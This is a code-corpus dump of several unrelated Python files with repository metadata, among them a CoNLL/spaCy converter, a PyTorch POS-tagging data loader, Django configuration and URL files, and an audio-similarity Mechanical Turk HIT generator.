blob_id stringlengths 40-40 | directory_id stringlengths 40-40 | path stringlengths 5-283 | content_id stringlengths 40-40 | detected_licenses sequencelengths 0-41 | license_type stringclasses 2 values | repo_name stringlengths 7-96 | snapshot_id stringlengths 40-40 | revision_id stringlengths 40-40 | branch_name stringclasses 58 values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 12.7k-662M ⌀ | star_events_count int64 0-35.5k | fork_events_count int64 0-20.6k | gha_license_id stringclasses 11 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 43 values | src_encoding stringclasses 9 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 7-5.88M | extension stringclasses 30 values | content stringlengths 7-5.88M | authors sequencelengths 1-1 | author stringlengths 0-73
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0534f9aaf5c3f06811ec0812276d154c0a7d8db6 | 627a97a5bdf3834ec6c86c76ebde7cc9c5000792 | /conll_and_spacy.py | c2077df470c8f81998c85ae4f87ad58a6723ccb6 | [] | no_license | c0ntradicti0n/CONNLator | 3391c8a570023239078f5dac3bcec41297675d82 | 1cfe6e4b5fde88d7812c1877521535928bddd85f | refs/heads/master | 2020-04-20T06:39:05.313513 | 2019-02-01T11:51:35 | 2019-02-01T11:51:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,715 | py | import re
import os
from itertools import count
import numpy as np
import pandas as pd
import copy
import logging
logging.getLogger(__name__).addHandler(logging.NullHandler())
def find_position_in_doc_by_approx(doc, text_token, pos, deviation=10):
    deviator = iterate_away(pos, deviation)
    for p in deviator:
        if p < 0:
            continue
        if p >= len(doc):
            continue
        if text_token == doc[p].text or ((text_token in ['’'] or len(text_token) < 2) and text_token in doc[p].text):
            return p
    else:
        logging.error("Token '%s' not seen in spacy doc (search tokens: '%s')! Returning starting position '%s'" %
                      (text_token,
                       str([w.text for w in doc[pos - deviation:pos + deviation]]),
                       str(doc[pos])))
        return pos
def iterate_away(pos, deviation):
    yield pos
    for d in range(1, deviation):
        yield pos + d
        yield pos - d
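# Example: iterate_away(5, 3) yields 5, 6, 4, 7, 3 -- positions ordered by
# increasing distance from the starting index.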
class ConllSpacyUpdater:
    def __init__(self, import_dir=None, export_dir=None):
        if not export_dir:
            raise AttributeError("Export dir must be given!")
        self.import_dir = import_dir
        self.export_dir = export_dir
    @staticmethod
    def read_one_conll(fname):
        sentence = []
        conll_lines = []
        with open(fname, 'r') as fh:
            for i, line in enumerate(fh):
                if not line.strip():
                    break  # a blank line terminates the sentence
                try:
                    sentence.append(re.search(r'(?:^\d+\t)([^\t]+)', line).group(1))
                    conll_lines.append(ConllSpacyUpdater.conll_line2match(line))
                except AttributeError:
                    logging.error("in file %s, line %d with line: '%s'" % (fname, i, line))
                    raise
        return conll_lines, " ".join(sentence)
    @staticmethod
    def load_all_conlls(export_path):
        all_sentences = []
        all_conlls = []
        import fnmatch
        # sort the files by the number embedded in their name
        for filename in sorted(os.listdir(export_path), key=lambda x: int(''.join(filter(str.isdigit, x)))):
            if fnmatch.fnmatch(filename, '*.conll'):
                filename = os.path.join(export_path, filename)
                conll_lines, sentence = ConllSpacyUpdater.read_one_conll(filename)
                all_sentences.append(sentence)
                all_conlls.append(conll_lines)
        return all_sentences, all_conlls
    def load_conll(self, i, corpus_path):
        if isinstance(i, list):
            docs = []
            for j in i:
                print(j)
                docs.append(self.load_conll(j, corpus_path))
            return docs
        fname = corpus_path + "/" + str(i) + '.conll'
        sentence = []
        with open(fname, 'r') as fh:
            for line in fh:
                if not line.strip():
                    break
                try:
                    sentence.append(re.search(r'(?:^\d+\t)([^\t]+)', line).group(1))
                except AttributeError:
                    print(i, "'" + line + "'")
                    raise
        doc = self.nlp(" ".join(sentence))
        # conll_over_spacy expects the directory and the file index, not the assembled path
        new_doc = self.conll_over_spacy(doc, corpus_path, i)
        return new_doc
    pattern = re.compile(r"""(?P<id>.*?)            # token index (1-based)
                         \t(?P<text>.*?)            # surface form
                         \t(?P<nothing1>.*?)        # lemma column
                         \t(?P<pos_>.*?)            # coarse-grained POS
                         \t(?P<tag_>.*?)            # fine-grained tag
                         \t(?P<nothing2>.*?)        # unused column
                         \t(?P<head_id>.*?)         # head index
                         \t(?P<dep_>.*?)            # dependency relation
                         \t(?P<spacy_i>.*?)         # spacy token index
                         \t(?P<coreference>.*?)     # coreference info
                         """, re.VERBOSE)
    col_set = ['i', 'text', 'lemma', 'pos', 'tag', 'nothing', 'head', 'dep', 'spacy_i', 'coreference']
    @staticmethod
    def conll_line2match(line):
        match = ConllSpacyUpdater.pattern.match(line)
        return match
    def conll_over_spacy(self, doc, dir, i, no_cols=()):
        to_change = set(self.col_set) - set(no_cols)
        fname = str(i) + '.conll'
        path = dir + "/" + fname
        # read the conll files, which may have been manipulated, back over the spacy doc
        with open(path) as f:
            for line in f:
                match = ConllSpacyUpdater.conll_line2match(line)
                i = int(match.group("id")) - 1
                head_i = int(match.group("head_id")) - 1
                doc[i].set_extension('coref', default=list(), force=True)
                try:
                    if 'head' in to_change:
                        doc[i].head = doc[head_i]
                    if 'lemma' in to_change:
                        doc[i].lemma_ = match.group("nothing1")  # the third column holds the lemma
                    if 'pos' in to_change:
                        doc[i].pos_ = match.group("pos_")
                    if 'tag' in to_change:
                        doc[i].tag_ = match.group("tag_")
                    if 'dep' in to_change:
                        doc[i].dep_ = match.group("dep_")
                    # if 'spacy_i' in to_change:
                    #     doc[i].i = match.group("spacy_i")
                    if 'coreference' in to_change:
                        doc[i]._.coref = match.group("coreference")
                except IndexError:
                    raise ValueError("Shape of the spacy doc and conll file incongruent, look at the number of tokens! '%s'" % (str(doc)))
        return doc
    conll_format = "%d\t%s\t%s\t%s\t%s\t%s\t%d\t%s\t%s\t%s"
    def export_dict(self, doc, index=None):
        res = []
        w_counter = count(0)
        start_i = doc[0].i
        for word in doc:
            i = next(w_counter)
            if word.head is word:
                head_idx = 0  # CoNLL convention: the root's head is 0
            else:
                head_idx = word.head.i - start_i + 1
            # indices must be +1 because of the conll format
            res.append(
                {'s_id': index,
                 'i': i + 1,
                 'text': word.text,
                 'lemma': word.lemma_,
                 'pos': word.pos_,
                 'tag': word.tag_,
                 'unknown': '_',
                 'head': head_idx,
                 'dep': word.dep_,
                 'corp_id': str(index) + '-' + str(word.i + 1),
                 'doc_i': word.i,
                 # 'coref': coref
                 }
            )
        return res
    @staticmethod
    def commonize_values(df, col_with_lists, col_to_index):
        """Select rows whose values in `col_with_lists` overlap with other rows."""
        v = df.merge(df, on=col_with_lists)
        common_cols = set(
            np.sort(v.iloc[:, [0, -1]].query(str('%s_x != %s_y' % (col_to_index, col_to_index))), axis=1).ravel()
        )
        return df[df[col_to_index].isin(common_cols)].groupby(col_to_index)[col_with_lists].apply(list)
    @staticmethod
    def explode(df, column_to_explode):
        """
        Similar to Hive's EXPLODE function: take a column with iterable elements and
        flatten the iterable to one element per observation in the output table.

        :param df: A dataframe to explode
        :type df: pandas.DataFrame
        :param column_to_explode:
        :type column_to_explode: str
        :return: An exploded data frame
        :rtype: pandas.DataFrame
        """
        new_observations = list()
        for row in df.to_dict(orient='records'):
            # Take out the exploding iterable
            explode_values = row[column_to_explode]
            del row[column_to_explode]
            # Create a new observation for every entry in the exploding iterable,
            # keeping all of the other columns
            for explode_value in explode_values:
                new_observation = copy.deepcopy(row)
                new_observation[column_to_explode] = explode_value
                new_observations.append(new_observation)
        return pd.DataFrame(new_observations)
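    # Illustrative usage of explode (frame and column invented):
    #   df = pd.DataFrame({'s_id': [0, 1], 'coref': [['a', 'b'], ['c']]})
    #   ConllSpacyUpdater.explode(df, 'coref')
    #   -> three rows, one per element of each 'coref' list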
    def annotate_corefs(self, doc, df):
        df['coref'] = [[] for _ in range(len(df))]

        def element_rest(l):
            for i, e in enumerate(l):
                yield e, l[:i] + l[i + 1:]

        def ref_from_row(r):
            try:
                row = df.query('doc_i in @r')
            except KeyError:
                print("not found?")
                return "out of the margins"
            if row.empty:
                # logging.error("df empty?")
                return "out of the margins"
            return str(row.s_id.values[0]) + "->" + "[" + str(row.i.values[0]) + ":" + str(row.i.values[-1] + 1) + "]"

        if doc._.has_coref:
            for cl in doc._.coref_clusters:
                for ment, rest_ments in element_rest(cl):
                    ids = range(ment.start, ment.end)
                    other_sents = [ref_from_row(range(r.start, r.end)) for r in rest_ments]
                    df.loc[df['doc_i'].isin(ids), 'coref'] += other_sents
        df.coref = df.coref.apply(lambda x: ",".join(x) if x else '_')
        return None
    def write_conll_by_df_group(self, x):
        conll_lines = []
        for row in x.itertuples():
            conll_lines.append(ConllSpacyUpdater.conll_format % (
                row.i,        # There's a word.i attr that's position in *doc*
                row.text,
                row.lemma,
                row.pos,      # Coarse-grained tag
                row.tag,      # Fine-grained tag
                row.unknown,
                row.head,
                row.dep,      # Relation
                row.corp_id,  # Generation_i
                row.coref))
        # export_dict stores the sentence id under 's_id'
        conll_path = self.export_dir + '/' + str(row.s_id) + '.conll'
        with open(conll_path, 'w+') as f:
            f.write("\n".join(conll_lines) + '\n')
        return None
| [
"[email protected]"
] | |
7b3330cc8f55c31d955a9ab01ad82f02f6f12b1f | abaa0bf93a6e38a1dcb814cf5602943875201815 | /base/todo/urls.py | 482b20a54096f6645647461f9e4b60a78aae4897 | [] | no_license | Software78/todoapp | 5eeb650ff8b54988299515eb9aea560eca02ba40 | ccae67429147c5b3138b091fd7c2a0e93c9b568c | refs/heads/master | 2023-06-03T15:34:53.688563 | 2021-06-25T16:17:19 | 2021-06-25T16:17:19 | 380,277,135 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 413 | py | from django.urls import path
from django.urls.conf import include
from .views import *
urlpatterns = [
    path('', Index, name='index'),
    path('signup/', signup, name='signup'),
    path('logout', logout, name='logout'),
    path('update/<int:pk>', UpdateTask.as_view(), name='update'),
    path('delete/<int:pk>', DeleteTask.as_view(), name='delete'),
    path('create/', CreateTask.as_view(), name='create'),
]
| [
"[email protected]"
] | |
0b054e68465391b0cd203f872d9230018d7c9c70 | 6a90c88cd3898a0936f83c7d2a8f713943d440db | /POSTagging-CharEmbed-CRF/dataloader/DataLoader.py | 17ec4ecac80046065e54c3979803a42fa4345c20 | [
"Apache-2.0"
] | permissive | LindgeW/POS-Tagging | 3be4bc5da30444b22722a15e3e39350231d42c76 | 358570047e8ad8403bcab4a1e9e3b082b9bea5fc | refs/heads/master | 2022-02-17T23:21:58.504742 | 2019-07-25T09:11:03 | 2019-07-25T09:11:03 | 186,325,676 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,501 | py | # from collections import Counter, defaultdict
import sys
sys.path.extend(['./', '../', '../../'])
import torch
import numpy as np
from dataloader.Vocab import POSVocab, CharVocab
# One Instance corresponds to one record (one annotated sentence) of the corpus
class Instance(object):
    def __init__(self, words, pos):
        self.words = words  # the word sequence
        self.pos = pos      # the POS-tag sequence aligned with the words

    def __str__(self):
        return ' '.join([wd + '_' + p for wd, p in zip(self.words, self.pos)])
# Load the dataset, wrapping each record in an Instance
def load_data(corpus_path):
    insts = []
    with open(corpus_path, 'r', encoding='utf-8', errors='ignore') as fin:
        for line in fin:
            tokens = line.strip().split()
            words, pos = [], []
            for token in tokens:
                words.append(token.split('_')[0])
                pos.append(token.split('_')[1])
            insts.append(Instance(words, pos))
    return insts
# Yield batches of data (open question from the author: how to prefetch data
# asynchronously in the background?)
def get_batch(data, batch_size, shuffle=True):
    if shuffle:
        np.random.shuffle(data)
    num_batch = int(np.ceil(len(data) / float(batch_size)))
    for i in range(num_batch):
        batch_data = data[i * batch_size: (i + 1) * batch_size]
        if shuffle:
            np.random.shuffle(batch_data)
        yield batch_data
# Build the vocabulary
def create_vocab(corpus_path):
    # words_counter = Counter()
    # pos_counter = Counter()
    words_set = set()
    pos_set = set()
    with open(corpus_path, 'r', encoding='utf-8', errors='ignore') as fin:
        for line in fin:
            tokens = line.strip().split()
            for token in tokens:
                wd, pos = token.split('_')
                # words_counter[wd] += 1
                # pos_counter[pos] += 1
                words_set.add(wd)
                pos_set.add(pos)
    return POSVocab(words_set, pos_set)
    # return POSVocab(words_counter, pos_counter)
def create_vocabs(corpus_path):
    words_set = set()
    char_set = set()
    pos_set = set()
    with open(corpus_path, 'r', encoding='utf-8', errors='ignore') as fin:
        for line in fin:
            tokens = line.strip().split()
            for token in tokens:
                wd, pos = token.split('_')
                char_set.update([ch.strip() for ch in wd])
                words_set.add(wd)
                pos_set.add(pos)
    return CharVocab(char_set), POSVocab(words_set, pos_set)
# def batch_variable(batch_data, vocab):
# batch_size = len(batch_data)
# max_len = max([len(inst.words) for inst in batch_data])
#
# wds_idxs = torch.zeros(batch_size, max_len, dtype=torch.long)
# pos_idxs = torch.zeros(batch_size, max_len, dtype=torch.long).fill_(-1)
# seq_lens = []
# for i, inst in enumerate(batch_data):
# seq_len = len(inst.words)
# seq_lens.append(seq_len)
# wds_idxs[i, :seq_len] = torch.LongTensor(vocab.word2index(inst.words))
# pos_idxs[i, :seq_len] = torch.LongTensor(vocab.pos2index(inst.pos))
#
# sorted_seq_lens, indices = torch.sort(torch.tensor(seq_lens), descending=True)
# _, unsorted_indices = torch.sort(indices)  # recover the order before sorting
# wds_idxs = torch.index_select(wds_idxs, dim=0, index=indices)
# pos_idxs = torch.index_select(pos_idxs, dim=0, index=indices)
# pos_idxs = pos_idxs.flatten()  # flatten to 1-D
#
# return wds_idxs, pos_idxs, sorted_seq_lens, unsorted_indices
# def batch_variable_mask(batch_data, vocab):
# batch_size = len(batch_data)
# max_len = max([len(inst.words) for inst in batch_data])
#
# wds_idxs = torch.zeros(batch_size, max_len, dtype=torch.long)
# pos_idxs = torch.zeros(batch_size, max_len, dtype=torch.long).fill_(-1)
# mask = torch.zeros(batch_size, max_len)
# seq_lens = []
# for i, inst in enumerate(batch_data):
# seq_len = len(inst.words)
# seq_lens.append(seq_len)
# wds_idxs[i, :seq_len] = torch.LongTensor(vocab.word2index(inst.words))
# pos_idxs[i, :seq_len] = torch.LongTensor(vocab.pos2index(inst.pos))
# mask[i, :seq_len] = torch.ones(seq_len)
# pos_idxs = pos_idxs.flatten() # 展平成一维
#
# return wds_idxs, pos_idxs, mask, seq_lens
# def batch_variable_mask_easy(batch_data, vocab):
# batch_size = len(batch_data)
# max_len = max([len(inst.words) for inst in batch_data])
#
# wds_idxs = torch.zeros(batch_size, max_len, dtype=torch.long)
# pos_idxs = torch.zeros(batch_size, max_len, dtype=torch.long).fill_(-1)
# seq_lens = torch.zeros(batch_size, )
# for i, inst in enumerate(batch_data):
# seq_len = len(inst.words)
# seq_lens[i] = seq_len
# wds_idxs[i, :seq_len] = torch.LongTensor(vocab.word2index(inst.words))
# pos_idxs[i, :seq_len] = torch.LongTensor(vocab.pos2index(inst.pos))
# pos_idxs = pos_idxs.flatten()  # flatten to 1-D
#
# return wds_idxs, pos_idxs, seq_lens
def pred_data_variable(insts, vocab, char_vocab):
    batch_size = len(insts)
    max_seq_len, max_wd_len = 0, 0
    for inst in insts:
        if len(inst.words) > max_seq_len:
            max_seq_len = len(inst.words)
        for wd in inst.words:
            if len(wd) > max_wd_len:
                max_wd_len = len(wd)
    wds_idxs = torch.zeros(batch_size, max_seq_len, dtype=torch.long)
    char_idxs = torch.zeros((batch_size, max_seq_len, max_wd_len), dtype=torch.long)
    seq_lens = torch.zeros(batch_size, )
    for i, inst in enumerate(insts):
        seq_len = len(inst.words)
        seq_lens[i] = seq_len
        for j, wd in enumerate(inst.words):
            char_idxs[i, j, :len(wd)] = torch.tensor(char_vocab.char2idx(wd), dtype=torch.long)
        wds_idxs[i, :seq_len] = torch.tensor(vocab.word2index(inst.words), dtype=torch.long)
    return wds_idxs, char_idxs, seq_lens
def batch_variable_mask_easy(batch_data, vocab, char_vocab):
    batch_size = len(batch_data)
    max_seq_len, max_wd_len = 0, 0
    for inst in batch_data:
        if len(inst.words) > max_seq_len:
            max_seq_len = len(inst.words)
        for wd in inst.words:
            if len(wd) > max_wd_len:
                max_wd_len = len(wd)
    wds_idxs = torch.zeros(batch_size, max_seq_len, dtype=torch.long)
    char_idxs = torch.zeros((batch_size, max_seq_len, max_wd_len), dtype=torch.long)
    pos_idxs = torch.zeros(batch_size, max_seq_len, dtype=torch.long).fill_(-1)
    mask = torch.zeros(batch_size, max_seq_len, dtype=torch.uint8)
    seq_lens = torch.zeros(batch_size, dtype=torch.int)
    # wd_lens = torch.zeros(batch_size, max_seq_len, dtype=torch.uint8)
    for i, inst in enumerate(batch_data):
        seq_len = len(inst.words)
        seq_lens[i] = seq_len
        for j, wd in enumerate(inst.words):
            wd_len = len(wd)
            char_idxs[i, j, :wd_len] = torch.tensor(char_vocab.char2idx(wd), dtype=torch.long)
            # wd_lens[i, j] = wd_len
        wds_idxs[i, :seq_len] = torch.tensor(vocab.word2index(inst.words), dtype=torch.long)
        pos_idxs[i, :seq_len] = torch.tensor(vocab.pos2index(inst.pos), dtype=torch.long)
        mask[i, :seq_len].fill_(1)
    return wds_idxs, char_idxs, pos_idxs, mask, seq_lens
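if __name__ == '__main__':
    # Minimal usage sketch; the corpus path and batch size are illustrative
    # assumptions, not part of the original module.
    insts = load_data('data/train.conll')
    char_vocab, pos_vocab = create_vocabs('data/train.conll')
    for batch in get_batch(insts, batch_size=32):
        wds, chars, pos, mask, seq_lens = batch_variable_mask_easy(batch, pos_vocab, char_vocab)
        print(wds.shape, chars.shape, pos.shape, mask.shape, seq_lens.shape)
        break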
| [
"[email protected]"
] | |
a9b647a1a7d01d0fa4c8e0864c95f9bfe21b1832 | 9f019d4846dd48d1817e36a2dcb23d8456531f2f | /botify_docs/wsgi.py | ea562c977bc3b069457272bd53b94c1be9446759 | [] | no_license | botify-hq/developers-docs | ca1a5b240c8bae0103db86e4f601b67fad3a4865 | 6a2a8eb6cf2fd957cd4768623d9df035d92b9198 | refs/heads/master | 2023-05-04T13:59:10.225927 | 2021-08-12T12:44:46 | 2021-08-12T12:44:46 | 49,753,427 | 2 | 2 | null | 2023-04-16T23:12:03 | 2016-01-16T01:08:14 | JavaScript | UTF-8 | Python | false | false | 489 | py | """
WSGI config for botify_docs project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/howto/deployment/wsgi/
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "botify_docs.settings")
from django.core.wsgi import get_wsgi_application
from whitenoise.django import DjangoWhiteNoise
application = get_wsgi_application()
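# Note: whitenoise 4+ removed whitenoise.django.DjangoWhiteNoise. With a newer
# whitenoise one would instead wrap the app directly (a sketch, not part of
# the original project):
#   from whitenoise import WhiteNoise
#   application = WhiteNoise(get_wsgi_application())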
application = DjangoWhiteNoise(application) | [
"[email protected]"
] | |
600942b5dd907bd8a3787e1534df6759ee55b663 | 1c314814e976134af5a4306582823fe6892d0930 | /create_similarity_hit.py | 7acbae527cd7be832a916aa306e70b1e6ad84338 | [] | no_license | floraxue/blow-mel-MOS | 7dcc19f1c194d437c1ba93a472a4c8845d9e8094 | 6bad9d10704b4ef9abb4ed59541f066cdcd27079 | refs/heads/master | 2022-10-02T09:11:09.020958 | 2020-06-05T15:21:49 | 2020-06-05T15:21:49 | 265,772,107 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,799 | py | import boto3
# from boto.mturk.connection import MTurkConnection
# from boto.mturk.question import HTMLQuestion
import numpy as np
import random
import os
import argparse
from mturk_similarity_html import *
tests_f_dir = 'audio_files/tests_f'
tests_m_dir = 'audio_files/tests_m'
EXTENSION = '.wav'
def create_div(divname, expname, dirname_pair, fname_pair):
audio_controls = [
audio_ctrl.format(expname=expname, fname=fname_pair[0],
dirname=dirname_pair[0],
divname=divname+'_audiosrc_vc'),
audio_ctrl.format(expname=expname, fname=fname_pair[1],
dirname=dirname_pair[1],
divname=divname+'_audiosrc_t')
]
random.shuffle(audio_controls)
radio_control = radio_ctrl.format(divname=divname+'_radio',
expname=expname,
fname=fname_pair[0].split('.')[0])
div = q_div.format(divname=divname+'_div',
audio_control1=audio_controls[0],
audio_control2=audio_controls[1],
radio_control=radio_control)
return div
def create_tests():
test_f_names = [fn for fn in os.listdir(tests_f_dir) if fn.endswith(EXTENSION)]
test_m_names = [fn for fn in os.listdir(tests_m_dir) if fn.endswith(EXTENSION)]
sel_f = np.random.choice(test_f_names, size=3, replace=False)
sel_m = np.random.choice(test_m_names, size=3, replace=False)
goods = [(sel_f[0], sel_f[0]), (sel_m[0], sel_m[0])]
bads = [(sel_f[1], sel_m[1]), (sel_f[2], sel_m[2])]
divs = [
create_div(divname='test1', expname='GT', fname_pair=goods[0],
dirname_pair=('tests_f', 'tests_f')),
create_div(divname='test2', expname='GT', fname_pair=goods[1],
dirname_pair=('tests_m', 'tests_m')),
create_div(divname='test3', expname='bad', fname_pair=bads[0],
dirname_pair=('tests_f', 'tests_m')),
create_div(divname='test4', expname='bad', fname_pair=bads[1],
dirname_pair=('tests_f', 'tests_m'))
]
return divs
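# (The test divs built by create_tests() act as attention checks: the two 'GT'
# pairs play the same recording twice and should be rated similar, while the
# two 'bad' pairs mix a female and a male test file and should be rated
# dissimilar.)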
def create_sim_question(expname):
divs = create_tests()
for i in range(10):
divs.append(create_div(divname='real'+str(i),
expname=expname,
fname_pair=('unknown_vc', 'unknown_t'),
dirname_pair=(expname, 'originals')))
np.random.shuffle(divs)
real_fns = ""
for fn in os.listdir('audio_files/' + expname):
real_fns += fn + ","
real_fns = real_fns[:-1]
original_fns = ""
for fn in os.listdir('audio_files/originals'):
original_fns += fn + ","
original_fns = original_fns[:-1]
hidden_div = filenames_div.format(real_fns=real_fns,
original_fns=original_fns)
question_html_value = html_start
question_html_value += hidden_div
for i in range(len(divs)):
question_html_value += divs[i]
question_html_value += html_end.format(fill_audios_js=experiment_js)
return question_html_value
def create_sim_source_gt_to_target_gt(expname):
divs = create_tests()
for i in range(10):
divs.append(create_div(divname='real'+str(i),
expname=expname,
fname_pair=('unknown_vc', 'unknown_t'),
dirname_pair=(expname, 'originals')))
np.random.shuffle(divs)
real_fns = ""
for fn in os.listdir('audio_files/blow_baseline'):
real_fns += fn + ","
real_fns = real_fns[:-1]
original_fns = ""
for fn in os.listdir('audio_files/originals'):
original_fns += fn + ","
original_fns = original_fns[:-1]
hidden_div = filenames_div.format(real_fns=real_fns,
original_fns=original_fns)
question_html_value = html_start
question_html_value += hidden_div
for i in range(len(divs)):
question_html_value += divs[i]
html_end_filled = html_end.replace('{fill_audios_js}', source_gt_target_gt_js)
question_html_value += html_end_filled
return question_html_value
def create_sim_target_gt_to_target_gt(expname):
divs = create_tests()
for i in range(10):
divs.append(create_div(divname='real'+str(i),
expname=expname,
fname_pair=('unknown_vc', 'unknown_t'),
dirname_pair=('target_gt1', 'target_gt2')))
np.random.shuffle(divs)
real_fns = ""
for fn in os.listdir('audio_files/blow_baseline'):
if fn.endswith('.wav'):
real_fns += fn + ","
real_fns = real_fns[:-1]
original_fns = ""
for fn in os.listdir('audio_files/originals'):
original_fns += fn + ","
original_fns = original_fns[:-1]
hidden_div = filenames_div.format(real_fns=real_fns,
original_fns=original_fns)
question_html_value = html_start
question_html_value += hidden_div
for i in range(len(divs)):
question_html_value += divs[i]
html_end_filled = html_end.replace('{fill_audios_js}', target_gt_target_gt_js)
question_html_value += html_end_filled
return question_html_value
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='')
parser.add_argument("--expname", type=str, required=True)
args = parser.parse_args()
# q = create_sim_question(args.expname)
# with open("gen_sim_mturk.html", "w") as fp:
# fp.write(q)
q = create_sim_source_gt_to_target_gt(args.expname)
with open("gen_sim_mturk_tgt_tgt.html", "w") as fp:
fp.write(q)
| [
"[email protected]"
] | |
95a161b0ba89a5c19ce9746208bba8f68afc9bbf | c94d54996e22eb49eee140bd42cae8d472fa6d7b | /moderate_problems/master_mind.py | f4fa3aea23a25e0b6f9c409d111fa65394c8a51a | [] | no_license | nirjharij/cracking-the-coding-interview-in-python | 7b9e116c7f0ba47e25072ef245d33370c7b3df08 | 74738eba62fa7683610ea12b00842889251eebcc | refs/heads/master | 2023-04-10T02:04:40.347851 | 2020-12-03T10:56:52 | 2020-12-03T10:56:52 | 360,791,802 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 981 | py | def result(guess, soln):
    # map each letter of the guess to the positions where it occurs
    guess_dict = {}
    for i in range(len(guess)):
        item = guess[i]
        if item in guess_dict:
            guess_dict[item].append(i)
        else:
            guess_dict[item] = [i]
    # same for the solution
    soln_dict = {}
    for i in range(len(soln)):
        item = soln[i]
        if item in soln_dict:
            soln_dict[item].append(i)
        else:
            soln_dict[item] = [i]
    hits = 0
    pseudo_hits = 0
    for item in soln_dict:
        soln_index = soln_dict[item]
        guess_index = guess_dict.get(item, None)
        if guess_index:
            # a hit is the same letter at the same position
            match_index = set(soln_index).intersection(set(guess_index))
            hits += len(match_index)
            # a pseudo-hit is the same letter at an unmatched position; at most
            # as many as remain unmatched on either side can count
            pseudo_hits += min(len(guess_index) - len(match_index),
                               len(soln_index) - len(match_index))
    print(hits)
    print(pseudo_hits)
result("RGGB", "RGGB")
| [
"[email protected]"
] | |
80a9ea7c9a085007351efe187574651f70c7efa9 | 2dce8389133562c48c183ef9fb89e053b7a3b6d1 | /manage.py | 53913bb9d1e3997d944e151a66af49fb97eee9cf | [] | no_license | Shatki/backend-evo | a742a9daaacc0a283529c47737057ee1f10228c0 | a977b6e346d73db53a21cc1aad094a377041f362 | refs/heads/master | 2020-06-20T09:41:27.838131 | 2019-12-02T06:05:59 | 2019-12-02T06:05:59 | 197,081,088 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 804 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "evotor.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| [
"[email protected]"
] | |
9dbbdac98da857411f92948a45a89e85d33b525f | f876239ac47cfa201f88e8148bcce2884f6fcadc | /jsonc/generators/models.py | 81de422554aa8b658a9337cd4abd2938301af61a | [] | no_license | iancarv/JSON-C | 481ea490c9d4dae5a2738eb4e5f4eb4abb1d94c2 | fed862cd0630dbd90650c29037f3d82b6f9e3262 | refs/heads/master | 2021-01-10T10:17:25.241750 | 2016-02-18T16:39:15 | 2016-02-18T16:39:15 | 51,881,222 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 607 | py | class Class(object):
"""docstring for Class"""
def __init__(self, name, Decorator=None, Superclass='object', Properties={}):
super(Class, self).__init__()
self.name = name
self.decorator = Decorator
self.superclass = Superclass
self.properties = []
for name, prop in Properties.items():
p = Property(name, **prop)
self.properties.append(p)
class Property(object):
"""docstring for Property"""
def __init__(self, name, Type, Default=None, Decorator=None):
super(Property, self).__init__()
self.name = name
self.t = Type
self.default = Default
self.decorator = Decorator
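if __name__ == '__main__':
    # Illustrative only: the property dicts mirror the **prop unpacking above.
    cls = Class('Point', Properties={'x': {'Type': 'int', 'Default': 0},
                                     'y': {'Type': 'int', 'Default': 0}})
    print(cls.name, [(p.name, p.t, p.default) for p in cls.properties])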
| [
"[email protected]"
] | |
14467e999e58538df3a9ace7cfbd2368c1054127 | 3f9d28984403cdd84b984d7a82eb6136018966a4 | /report_account_header/__manifest__.py | 2d4752617140bbb3d923feca507bd5b6df96d207 | [] | no_license | joevm018/temasq | bee1c69aee4c87de415e66e236b40c28201e2951 | 74f003c6a009716bf26a6438f5ee48e7dfcbb030 | refs/heads/master | 2023-03-18T23:42:13.598853 | 2021-03-11T11:35:16 | 2021-03-11T11:35:16 | 346,671,390 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,371 | py | # -*- coding: utf-8 -*-
##############################################################################
#
# Author: Al Kidhma Group
# you can modify it under the terms of the GNU LESSER
# GENERAL PUBLIC LICENSE (LGPL v3), Version 3.
#
# It is forbidden to publish, distribute, sublicense, or sell copies
# of the Software or modified copies of the Software.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU LESSER GENERAL PUBLIC LICENSE (LGPL v3) for more details.
#
# You should have received a copy of the GNU LESSER GENERAL PUBLIC LICENSE
# GENERAL PUBLIC LICENSE (LGPL v3) along with this program.
# If not, see <https://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Modified Report Letterheads',
'version': '10.0',
'category': 'Generic Modules/Others',
'sequence': 2,
'summary': 'Manage Reporting',
'description': """
Sales Reports
""",
'author': 'Al Kidhma Group',
'depends': ['report','account', 'base'],
'data': [
'views/report_templates.xml',
],
'qweb': [],
'installable': True,
'application': True,
'auto_install': False,
}
| [
"[email protected]"
] | |
87e29c358714d587181ceb01527a7a958385f00a | 22298f9b11ea3949989942797666239bc52fb12f | /news/views.py | d507c9f360355e5ea8e2851df6aa1e0ea96bd2b7 | [] | no_license | AlexPyDev/Task | 6694914260952b1d471cac9fb1b36bda6965f47f | e968463ad5f2b210cdeb64c98ab066a8506ab61e | refs/heads/master | 2022-12-14T14:21:11.103386 | 2019-10-29T10:46:07 | 2019-10-29T10:46:07 | 216,048,923 | 0 | 0 | null | 2022-04-22T22:30:08 | 2019-10-18T15:01:00 | Python | UTF-8 | Python | false | false | 1,895 | py | from django.contrib.auth.decorators import login_required
